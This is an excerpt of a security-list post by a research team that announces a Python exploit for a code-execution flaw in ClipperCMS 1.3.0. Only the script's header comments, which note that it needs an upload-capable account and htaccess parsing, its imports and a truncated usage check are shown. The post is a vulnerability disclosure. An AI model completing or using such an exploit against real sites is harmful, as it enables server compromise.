ClipperCMS 1.3.0: Code Execution Exploit

Posted by Curesec Research Team (CRT) on Nov 14

#!/usr/local/bin/python
# Exploit for ClipperCMS 1.3.0 Code Execution vulnerability
# An account is required with rights to file upload (eg a user in the Admin, Publisher, or Editor role)
# The server must parse htaccess files for this exploit to work.
# Curesec GmbH crt () curesec com

import sys
import re
import requests # requires requests lib

if len(sys.argv) != 4:
exit(“usage: python ” + sys.argv[0] + “…

007 Software

ClipperCMS 1.3.0: Code Execution Exploit

Software and Security Information